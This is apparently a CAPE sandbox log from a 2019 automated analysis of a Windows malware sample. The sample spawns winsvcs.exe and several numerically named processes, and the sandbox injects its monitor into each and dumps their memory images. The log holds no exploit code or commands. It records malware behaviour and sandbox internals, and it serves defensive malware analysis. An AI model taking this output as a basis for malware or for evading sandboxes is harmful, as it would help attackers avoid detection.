Analysis

Category: FILE
Package: Extraction
Started: 2019-01-10 03:35:21
Completed: 2019-01-10 03:39:35
Duration: 254 seconds

Options:
route = internet
procdump = 0

Log:
2019-01-10 03:35:22,000 [root] INFO: Date set to: 01-10-19, time set to: 03:35:22, timeout set to: 200
2019-01-10 03:35:22,030 [root] DEBUG: Starting analyzer from: C:\ljxoi
2019-01-10 03:35:22,030 [root] DEBUG: Storing results at: C:\ckqduXtm
2019-01-10 03:35:22,030 [root] DEBUG: Pipe server name: \\.\PIPE\IFAEqB
2019-01-10 03:35:22,030 [root] INFO: Analysis package "Extraction" has been specified.
2019-01-10 03:35:23,075 [root] DEBUG: Started auxiliary module Browser
2019-01-10 03:35:23,075 [root] DEBUG: Started auxiliary module Curtain
2019-01-10 03:35:23,075 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2019-01-10 03:35:23,075 [root] DEBUG: Started auxiliary module DigiSig
2019-01-10 03:35:23,092 [root] DEBUG: Started auxiliary module Disguise
2019-01-10 03:35:23,092 [root] DEBUG: Started auxiliary module Human
2019-01-10 03:35:23,092 [root] DEBUG: Started auxiliary module Screenshots
2019-01-10 03:35:23,092 [root] DEBUG: Started auxiliary module Sysmon
2019-01-10 03:35:23,107 [root] DEBUG: Started auxiliary module Usage
2019-01-10 03:35:23,107 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Extraction
2019-01-10 03:35:23,107 [root] INFO: Analyzer: Package modules.packages.Extraction does not specify a DLL_64 option
2019-01-10 03:35:23,559 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe" with arguments "" with pid 2992
2019-01-10 03:35:23,559 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:35:23,559 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:35:23,917 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2992
2019-01-10 03:35:25,930 [lib.api.process] INFO: Successfully resumed process with pid 2992
2019-01-10 03:35:25,930 [root] INFO: Added new process to list with pid: 2992
2019-01-10 03:35:25,961 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:35:25,961 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:35:25,961 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:35:25,977 [root] INFO: Monitor successfully loaded in process with pid 2992.
2019-01-10 03:35:43,855 [root] DEBUG: ProtectionHandler: Address: 0x5d8b80, RegionSize: 0x292b
2019-01-10 03:35:43,855 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x5d8b80
2019-01-10 03:35:43,855 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x5d8b80, AllocationSize: 0x292b, ThreadId: 0xbb4
2019-01-10 03:35:43,855 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x5d8b80 and Type=0x0.
2019-01-10 03:35:43,855 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x5d8b80, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:35:43,855 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x5d8b80
2019-01-10 03:35:43,871 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x5d8b80
2019-01-10 03:35:43,871 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x5d8b80.
2019-01-10 03:35:43,871 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x5b0000, size 0x2b4ab).
2019-01-10 03:35:43,871 [root] DEBUG: DumpPEsInRange: Scanning range 0x5b0000 - 0x5db4ab.
2019-01-10 03:35:43,871 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x5b0000-0x5db4ab.
2019-01-10 03:35:43,885 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2992_8714335710412019
2019-01-10 03:35:43,885 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2992_8714335710412019
2019-01-10 03:35:43,885 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x5d8b80 - 0x5db4ab.
2019-01-10 03:35:43,885 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x5d8b80.
2019-01-10 03:35:43,885 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x5b0000.
2019-01-10 03:35:43,885 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:35:43,885 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0x8000
2019-01-10 03:35:43,885 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x408000.
2019-01-10 03:35:43,885 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:35:43,885 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:35:43,885 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:35:43,885 [root] DEBUG: DumpProcess: Module entry point VA is 0x407e9d
2019-01-10 03:35:43,901 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2992_8864335710412019
2019-01-10 03:35:43,917 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:35:43,917 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:35:43,917 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x408000.
2019-01-10 03:35:43,917 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:35:43,996 [root] INFO: Disabling sleep skipping.
2019-01-10 03:35:49,657 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 2912
2019-01-10 03:35:49,657 [root] INFO: Added new process to list with pid: 2912
2019-01-10 03:35:49,657 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:35:49,657 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:35:49,704 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2912
2019-01-10 03:35:49,736 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:35:49,736 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:35:49,736 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:35:49,736 [root] INFO: Disabling sleep skipping.
2019-01-10 03:35:49,752 [root] INFO: Monitor successfully loaded in process with pid 2912.
2019-01-10 03:35:50,250 [root] INFO: Notified of termination of process with pid 2992.
2019-01-10 03:35:51,280 [root] INFO: Process with pid 2992 has terminated
2019-01-10 03:36:08,410 [root] DEBUG: ProtectionHandler: Address: 0x329308, RegionSize: 0x292b
2019-01-10 03:36:08,424 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x329308
2019-01-10 03:36:08,456 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x329308, AllocationSize: 0x292b, ThreadId: 0xb50
2019-01-10 03:36:08,471 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x329308 and Type=0x0.
2019-01-10 03:36:08,471 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x329308, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:36:08,487 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x329308
2019-01-10 03:36:08,487 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x329308
2019-01-10 03:36:08,503 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x329308.
2019-01-10 03:36:08,519 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x300000, size 0x2bc33).
2019-01-10 03:36:08,549 [root] DEBUG: DumpPEsInRange: Scanning range 0x300000 - 0x32bc33.
2019-01-10 03:36:08,549 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x300000-0x32bc33.
2019-01-10 03:36:08,581 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2912_550836710412019
2019-01-10 03:36:08,581 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2912_550836710412019
2019-01-10 03:36:08,581 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x329308 - 0x32bc33.
2019-01-10 03:36:08,581 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x329308.
2019-01-10 03:36:08,611 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x300000.
2019-01-10 03:36:08,628 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:36:08,658 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0x8000
2019-01-10 03:36:08,658 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x408000.
2019-01-10 03:36:08,674 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:36:08,690 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:36:08,690 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:36:08,706 [root] DEBUG: DumpProcess: Module entry point VA is 0x407e9d
2019-01-10 03:36:08,721 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2912_722836710412019
2019-01-10 03:36:08,721 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:36:08,736 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:36:08,736 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x408000.
2019-01-10 03:36:08,736 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:36:20,967 [root] INFO: Announced 32-bit process name: 2841536727.exe pid: 2744
2019-01-10 03:36:20,967 [root] INFO: Added new process to list with pid: 2744
2019-01-10 03:36:20,967 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:20,983 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:20,983 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2744
2019-01-10 03:36:20,999 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:20,999 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x2e0000
2019-01-10 03:36:20,999 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:21,013 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:21,013 [root] INFO: Monitor successfully loaded in process with pid 2744.
2019-01-10 03:36:21,170 [root] DEBUG: ProtectionHandler: Address: 0x53de20, RegionSize: 0x43d1
2019-01-10 03:36:21,170 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x53de20
2019-01-10 03:36:21,186 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x53de20, AllocationSize: 0x43d1, ThreadId: 0xab4
2019-01-10 03:36:21,186 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x53de20 and Type=0x0.
2019-01-10 03:36:21,201 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x53de20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:36:21,217 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x53de20
2019-01-10 03:36:21,247 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x53de20
2019-01-10 03:36:21,247 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x53de20.
2019-01-10 03:36:21,247 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x510000, size 0x321f1).
2019-01-10 03:36:21,247 [root] DEBUG: DumpPEsInRange: Scanning range 0x510000 - 0x5421f1.
2019-01-10 03:36:21,247 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x510000-0x5421f1.
2019-01-10 03:36:21,247 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2744_2482136710412019
2019-01-10 03:36:21,279 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2744_2482136710412019
2019-01-10 03:36:21,279 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x53de20 - 0x5421f1.
2019-01-10 03:36:21,279 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x53de20.
2019-01-10 03:36:21,279 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x510000.
2019-01-10 03:36:21,279 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:36:21,279 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:36:21,279 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:36:21,279 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:36:21,279 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:36:21,295 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:36:21,295 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:36:21,295 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2744_2952136710412019
2019-01-10 03:36:21,295 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:36:21,311 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:36:21,311 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:36:21,311 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:36:23,401 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 1340
2019-01-10 03:36:23,401 [root] INFO: Added new process to list with pid: 1340
2019-01-10 03:36:23,401 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:23,417 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:23,431 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1340
2019-01-10 03:36:23,447 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:23,463 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:36:23,463 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:23,479 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:23,479 [root] INFO: Monitor successfully loaded in process with pid 1340.
2019-01-10 03:36:23,619 [root] DEBUG: ProtectionHandler: Address: 0x8fe5d0, RegionSize: 0x43d1
2019-01-10 03:36:23,619 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x8fe5d0
2019-01-10 03:36:23,634 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x8fe5d0, AllocationSize: 0x43d1, ThreadId: 0x8f0
2019-01-10 03:36:23,651 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x8fe5d0 and Type=0x0.
2019-01-10 03:36:23,651 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x8fe5d0, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:36:23,651 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x8fe5d0
2019-01-10 03:36:23,665 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x8fe5d0
2019-01-10 03:36:23,665 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x8fe5d0.
2019-01-10 03:36:23,681 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x8d0000, size 0x329a1).
2019-01-10 03:36:23,681 [root] DEBUG: DumpPEsInRange: Scanning range 0x8d0000 - 0x9029a1.
2019-01-10 03:36:23,697 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x8d0000-0x9029a1.
2019-01-10 03:36:23,697 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\1340_6982336710412019
2019-01-10 03:36:23,713 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\1340_6982336710412019
2019-01-10 03:36:23,713 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x8fe5d0 - 0x9029a1.
2019-01-10 03:36:23,713 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x8fe5d0.
2019-01-10 03:36:23,713 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x8d0000.
2019-01-10 03:36:23,713 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:36:23,713 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:36:23,713 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:36:23,713 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:36:23,713 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:36:23,713 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:36:23,729 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:36:23,743 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\1340_7292336710412019
2019-01-10 03:36:23,743 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:36:23,743 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:36:23,759 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:36:23,759 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:36:23,963 [root] INFO: Notified of termination of process with pid 2744.
2019-01-10 03:36:24,025 [root] INFO: Process with pid 2744 has terminated
2019-01-10 03:36:25,819 [root] INFO: Announced 32-bit process name: 3751939260.exe pid: 2572
2019-01-10 03:36:25,835 [root] INFO: Added new process to list with pid: 2572
2019-01-10 03:36:25,835 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:25,835 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:25,835 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2572
2019-01-10 03:36:25,835 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:25,835 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:36:25,849 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:25,849 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:25,849 [root] INFO: Monitor successfully loaded in process with pid 2572.
2019-01-10 03:36:30,779 [root] INFO: Announced 32-bit process name: 1495120250.exe pid: 2956
2019-01-10 03:36:30,811 [root] INFO: Added new process to list with pid: 2956
2019-01-10 03:36:30,874 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:30,967 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:31,029 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2956
2019-01-10 03:36:31,122 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:31,186 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:36:31,263 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:31,309 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:31,388 [root] INFO: Monitor successfully loaded in process with pid 2956.
2019-01-10 03:36:31,716 [root] DEBUG: ProtectionHandler: Address: 0x65de20, RegionSize: 0x43d1
2019-01-10 03:36:31,809 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x65de20
2019-01-10 03:36:31,888 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x65de20, AllocationSize: 0x43d1, ThreadId: 0xb88
2019-01-10 03:36:31,950 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x65de20 and Type=0x0.
2019-01-10 03:36:32,028 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x65de20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:36:32,121 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x65de20
2019-01-10 03:36:32,200 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x65de20
2019-01-10 03:36:32,246 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x65de20.
2019-01-10 03:36:32,355 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x630000, size 0x321f1).
2019-01-10 03:36:32,387 [root] DEBUG: DumpPEsInRange: Scanning range 0x630000 - 0x6621f1.
2019-01-10 03:36:32,526 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x630000-0x6621f1.
2019-01-10 03:36:32,573 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2956_5583236710412019
2019-01-10 03:36:32,947 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2956_5583236710412019
2019-01-10 03:36:33,026 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x65de20 - 0x6621f1.
2019-01-10 03:36:33,088 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x65de20.
2019-01-10 03:36:33,197 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x630000.
2019-01-10 03:36:33,276 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:36:33,306 [root] INFO: Announced 32-bit process name: 1865041414.exe pid: 2884
2019-01-10 03:36:33,354 [root] INFO: Added new process to list with pid: 2884
2019-01-10 03:36:33,354 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:36:33,431 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:33,479 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:36:33,540 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:36:33,588 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:33,650 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:36:33,681 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2884
2019-01-10 03:36:33,743 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:36:33,838 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:36:33,852 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:33,993 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:36:34,164 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:34,305 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:34,305 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2956_9003336710412019
2019-01-10 03:36:34,461 [root] INFO: Monitor successfully loaded in process with pid 2884.
2019-01-10 03:36:34,493 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:36:34,805 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:36:34,819 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:36:34,882 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:36:35,911 [root] INFO: Notified of termination of process with pid 2956.
2019-01-10 03:36:36,520 [root] INFO: Process with pid 2956 has terminated
2019-01-10 03:36:36,630 [root] INFO: Announced 32-bit process name: 1717238076.exe pid: 1352
2019-01-10 03:36:36,707 [root] INFO: Added new process to list with pid: 1352
2019-01-10 03:36:36,816 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:36,941 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:37,066 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1352
2019-01-10 03:36:37,269 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:37,362 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:36:37,440 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:37,549 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:37,628 [root] INFO: Monitor successfully loaded in process with pid 1352.
2019-01-10 03:36:38,517 [root] INFO: Announced 32-bit process name: 2080821079.exe pid: 1132
2019-01-10 03:36:38,595 [root] INFO: Added new process to list with pid: 1132
2019-01-10 03:36:38,688 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:38,923 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:39,048 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1132
2019-01-10 03:36:39,266 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:39,421 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:36:39,578 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:39,766 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:39,921 [root] INFO: Monitor successfully loaded in process with pid 1132.
2019-01-10 03:36:40,217 [root] DEBUG: ProtectionHandler: Address: 0x64de20, RegionSize: 0x43d1
2019-01-10 03:36:40,326 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x64de20
2019-01-10 03:36:40,436 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x64de20, AllocationSize: 0x43d1, ThreadId: 0x42c
2019-01-10 03:36:40,561 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x64de20 and Type=0x0.
2019-01-10 03:36:40,592 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x64de20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:36:40,608 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x64de20
2019-01-10 03:36:40,670 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x64de20
2019-01-10 03:36:40,701 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x64de20.
2019-01-10 03:36:40,763 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x620000, size 0x321f1).
2019-01-10 03:36:40,825 [root] DEBUG: DumpPEsInRange: Scanning range 0x620000 - 0x6521f1.
2019-01-10 03:36:40,888 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x620000-0x6521f1.
2019-01-10 03:36:40,936 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\1132_9204036710412019
2019-01-10 03:36:41,184 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\1132_9204036710412019
2019-01-10 03:36:41,279 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x64de20 - 0x6521f1.
2019-01-10 03:36:41,341 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x64de20.
2019-01-10 03:36:41,466 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x620000.
2019-01-10 03:36:41,575 [root] DEBUG: MidPageExecCallback executed successfully.
